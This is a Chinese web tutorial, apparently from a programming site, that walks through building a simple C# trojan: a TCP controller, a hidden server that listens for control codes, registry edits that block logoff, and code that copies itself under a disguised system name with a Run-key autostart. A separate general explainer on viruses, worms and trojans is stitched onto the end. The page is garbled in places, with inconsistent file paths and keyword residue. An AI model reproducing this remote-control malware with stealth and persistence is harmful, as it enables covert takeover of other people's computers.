木马刑铁莲花？木马刑

一个完整的木马系统由硬件部分，软件部分和具体连接部分组成。

这里主要对软件部分介绍，它主要有控制端程序、木马程序（后台服务程序）、木马配制程序组成。

控制端用以远程控制服务端的程序；木马程序是潜入服务端内部，获取其操作权限的程序；木马配制程序是设置木马程序的端口号，触发条件，木马名称等，使其在服务端藏的更隐蔽的程序。

使用的技术：控制端程序发送控制码控制服务器，服务器后台运行，修改注册表达到控制的目的。

技术不是很难的，主要体现C#的网络编程和注册表的修改。

控制端开发：控制端向服务器发出一段控制码，服务端（木马程序）收到控制码后，根据控制的要求，完成指定的要求，如果服务器完成工作，返回成功的信息。

控制端的开发：控制码的设定你可以自已设定，不需要详解，主要有以下几个难点。

1、连接请求使用了.NET类中的 System.Net.Sockets.TcpClient类,TcpClient(string hostname,int port)Hostname 是要控制的主机名称，当然你也可以用IP地址。

Port是端口。

// System.EventArgs包含事件数据类的基类private void button7_Click(object sender, System.EventArgs e){//记录操作,在richTextBox控件中增加操作信息richTextBox1.AppendText("请求连接" +textBox1.Text +" ");int port =6678;try{//初始化 TcpClient 类的新实例并连接到指定主机上的指定端口client = new TcpClient(textBox1.Text,port);}catch{MessageBox.Show("服务器不在线!确定是否输入主机名称.");richTextBox1.AppendText("服务器不在线!确定是否输入主机名称.");}}//private void buttion2、测试是否与被控制机连接上。

程序的流程是发送控制码看控制端是否有反应，如果有返回则显示控制成功。

//提供网络访问的数据流//private NetworkStream stream;代码如下：private void button8_Click(object sender, System.EventArgs e){//纪录操作 richTextBox1.AppendText("测试连接" +" ");try{stream = client.GetStream();if(stream.CanWrite){//发送控制码string control = "jiance";byte[] by =System.Text.Encoding.ASCII.GetBytes(control.ToCharArray());stream.Write(by,0,by.Length);//下次使用stream.Flush();//启动接收反回数据的线程//receive是线程执行的函数，见后面的分析threadReceive = new Thread(new ThreadStart(receive));threadReceive.Start();}}catch(Exception ee){richTextBox1.AppendText (ee.Message+" ");MessageBox.Show(ee.Message);}}3、控制生效的代码private void button9_Click(object sender, System.EventArgs e){//这里是确定要发送的控制码，RadioButton是窗体控件if(radioButton1.Checked){ control = form2.zhucex;}else if(radioButton2.Checked){ control =form3.zhuces;}else if(radioButton3.Checked){ control = warring;}else if(radioButton4.Checked){ control =suggest;}else if(radioButton5.Checked){ control =form4.mumawe;}else if(radioButton6.Checked){ control =drop;}if (control =="000000"){ MessageBox.Show("你没有输入任何控制目标!不发控制信号");richTextBox1.AppendText("你没有输入任何控制目标!不发控制信号");}else if(control != "000000"){try{//记录操作richTextBox1.AppendText (control + "正在试图控制,等待回应......" + " ");stream = client.GetStream();if(stream.CanWrite ){byte[] by = System.Text.Encoding.ASCII.GetBytes(control.ToCharArray ());stream.Write(by,0,by.Length);stream.Flush();threadReceive =new Thread(new ThreadStart(receive));threadReceive.Start();}//endif}//trycatch{richTextBox1.AppendText("服务器未连接1控制无效!" +" ");MessageBox.Show("服务器未连接1控制无效!" +" ");}}//else if}4、线程执行的函数private void receive(){//设置读取数据的空间byte[] bb = new byte[3];//读取3个字节,i为实际读取的字节数int i = stream.Read(bb,0,3);//转换成字符串，如果是中文控制码则用string ss = //System.Text.Encoding.Unicode.GetString(bb);string ss = System.Text.Encoding.ASCII.GetString(bb);//hjc为我设置的服务器的返回码 hjc为连接成功，hkz为控制成功if(ss=="hjc"){MessageBox.Show("连接成功");richTextBox1.AppendText("连接成功");}if(ss== "hkz"){richTextBox1.AppendText(control +"控制成功"+" ");MessageBox.Show(control +"控制成功"+" ");}}服务端的开发：要实现木马服务的程序，主要实现以下几个功能：后台的运行（隐藏技术），控制码的接收与注册表的修改，下面对这三方面做介绍：1、在VC#中，建立一个后台服务程序是很容易的，先建立一个新的C#的Windows应用程序，项目名称自定（不过为了隐藏可使用与系统相近的名称），将窗体属性“ShowInTaskbar”属性设为false,让它运行时不会在任务栏中显示，并将属性“Windowstate”属性设为 Mininized即可，这样窗体就可以隐藏运行了。

当然你也可以在InitializeComponent()设置，此函数起初始化的作用，在窗体显示前运行，代码如下：private void InitializeComponent(){//// Form1////窗体显示的起点和大小this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);this.ClientSize = new System.Drawing.Size(368, 357);//窗体名称this.Name = "Form1";//设置属性让它后台运行this.ShowInTaskbar = false;this.Text = "Form1";this.WindowState = System.Windows.Forms.FormWindowState.Minimized;}2、控制代码的接收，必需在服务程序运行开始就启动，所以侦听线程必需在程序初始化中启动，所以放在窗体的构造函数中，代码注解如下：public Form1() //窗体的构造函数{//// Windows 窗体设计器支持所必需的//InitializeComponent();//// TODO: 在 InitializeComponent 调用后添加任何构造函数代码//加入你的侦听代码//端口你可以自已设定,我使用了固定的端口int port =6678;//System.Net.Sockets.TcpListener是用来在Tcp网络中侦听客户端的listener = new TcpListener(port);//启动侦听listener.Start();//增加接收控制码的线程,如果要停止线程可以用 Thread.abort()//reControlCode 是线程启动执行的函数，此函数根据接收的控制//控制码选取合适的注册表修改函数Thread thread = new Thread(new ThreadStart(reControlCode));thread.Start();}reControlCode函数如下，完整代码见程序private void reControlCode(){//设置接收套接字,接收listener.AcceptSocket是返回已经接收的客户的请求socket = listener.AcceptSocket();//如果连接成功执行while (socket.Connected){//接收控制码byte [] by =new byte[6];int i = socket.Receive(by,by.Length ,0);string ss = System.Text.Encoding.ASCII.GetString(by);//根据控制码执行不同的功能//修改注册表加入编码switch (ss){case "jiance"://测试连接,返回测试信息string str ="hjc";byte [] bytee = System.Text.Encoding.ASCII.GetBytes(str);socket.Send(bytee,0,bytee.Length,0);break;case "zx1000"://修改注册表函数,自已定义，见下面分析UnLogOff();//返回控制消息retMessage();break; case "zx0100"://修改注册表函数UnClose();//返回控制消息retMessage();break;//重复的case功能与前面一样,略掉default:break;}//case}//while} //private void reControlCode 3、C#中实现注册表的修改，使用了.NET类库中的System.Microsoft.Win32命令空间，它提供两种类型的类：处理由操作系统引发的事件的类和对系统注册表进行操作的类。

下面就可以看到它的用法。

这里我做了一个修改注册表的子程序：使计算机不能注销。

在这之前先了解注册表，在子键SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer下面设键值NoLogOff 为 1 即可使计算机无法注销。

在下面的函数中用C#实现对注册表的修改：private void UnLogOff(){//得到主机的注册表的顶级节点Microsoft.Win32.RegistryKey rLocal = Registry.LocalMachine;//设置一个注册表子键的变量RegistryKey key1;try{//函数RegistryKey.OpenSubkey(string registrykey,bool canwrite)检索指定的子键//registrykey是用户指定的键值，canwrite 为true则可修改，默认为fasle不可改key1 =rLocal.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);//设置子键的键名，和值key1.SetValue ("NoLogOff",1);//关闭打开的子键key1.Close();//警告字符串设定mystr = mystr +"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值Nologoff被修改！请将它置为0!";}catch{}//如果不存在自已建立if(key1 ==null){try{ //使用RegistryKey.CreateSubKey(string mystring)函数来建立你需要的子键RegistryKey key2 = rLocal.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");key2.SetValue("NoLogOff",1);key2.Close();mystr = mystr +"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值Nologoff被修改！请将它置为0!";}catch{}}}4、在木马程序中还有一个重要的功能就是自我的复制和转移。

木马引入被控制的主机时必需自动将木马隐藏在System,System32的目录下以防被发现。

转移的代码分析如下，主要实现的功能是将D盘下的木马程序转移到C:\\winnnt\\system\\msdoss.exe，同时换名称。

使用的.NET命名空间System.IO,它的作用是允许对数据流和文件进行同步和异步读写。

这里我们使用了System.IO.File类。

-- -www.bianceng.cnprivate void moveCC1(){try{//函数File.Move(string sourceFileName,string destFileName)起移动文件的作用//sourceFileName为要移动的文件名，destFileName为文件的新路径File.Move("C:\\winnnt\\system\\msdoss.exe","d:\\winnt\\system32\\expleror.exe");}catch {}//将新移的木马程序设为自启动.分析和前面一样try{key1 = rLocal.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);key1.SetValue ("microsoftt","d:\\winnt\\system32\\expleror.exe");key1.Close();}catch{}if(key1 ==null){try{RegistryKey key2=rLocal.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");key1.SetValue ("microsoftt","d:\\winnt\\system32\\expleror.exe");key1.Close();}catch{}}} //moveCC1()到这里一个简单的C#的木马就完成了。

用,实现,简单,木马,程序,用,实现,木马,程序,

病毒、蠕虫、木马大威胁 随着互联网的日益流行，各种病毒木马也猖厥起来，几乎每天都有新的病毒产生，大肆传播破坏，给广大互联网用户造成了极大的危害，几乎到了令人谈毒色变的地步。

各种病毒，蠕虫，木马纷至沓来，令人防不胜防，苦恼无比。

那么，究竟什么是病毒，蠕虫，木马，它们之间又有什么区别?相信大多数人对这个问题并没有一个清晰的了解，在这里，我们就来简单讲讲。

病毒、蠕虫和特洛伊木马是可导致您的计算机和计算机上的信息损坏的恶意程序。

它们可能使你的网络和操作系统变慢，危害严重时甚至会完全破坏您的系统，并且，它们还可能使用您的计算机将它们自己传播给您的朋友、家人、同事以及Web的其他地方，在更大范围内造成危害。

这三种东西都是人为编制出的恶意代码，都会对用户照成危害，人们往往将它们统称作病毒，但其实这种称法并不准确，它们之间虽然有着共性，但也有着很大的差别。

什么是病毒? 计算机病毒(ComputerVirus),根据《中华人民共和国计算机信息系统安全保护条例》，病毒的明确定义是"指编制或者在计算机程序中插入的破坏计算机功能或者破坏数据，影响计算机使用并且能够自我复制的一组计算机指令或者程序代码"。

病毒必须满足两个条件: 1、它必须能自行执行。

它通常将自己的代码置于另一个程序的执行路径中。

2、它必须能自我复制。

例如，它可能用受病毒感染的文件副本替换其他可执行文件。

病毒既可以感染桌面计算机也可以感染网络服务器。

此外，病毒往往还具有很强的感染性，一定的潜伏性，特定的触发性和很大的破坏性等，由于计算机所具有的这些特点与生物学上的病毒有相似之处，因些人们才将这种恶意程序代码称之为"计算机病毒"。

一些病毒被设计为通过损坏程序、删除文件或重新格式化硬盘来损坏计算机。

有些病毒不损坏计算机，而只是复制自身，并通过显示文本、视频和音频消息表明它们的存在。

即使是这些良性病毒也会给计算机用户带来问题。

通常它们会占据合法程序使用的计算机内存。

结果，会引起操作异常，甚至导致系统崩溃。

另外，许多病毒包含大量错误，这些错误可能导致系统崩溃和数据丢失。

令人欣慰的是，在没有人员操作的情况下，一般的病毒不会自我传播，必须通过某个人共享文件或者发送电子邮件等方式才能将它一起移动。

典型的病毒有黑色星期五病毒等。

如何,区分,病毒,、,蠕虫,与,木马,如何,区分,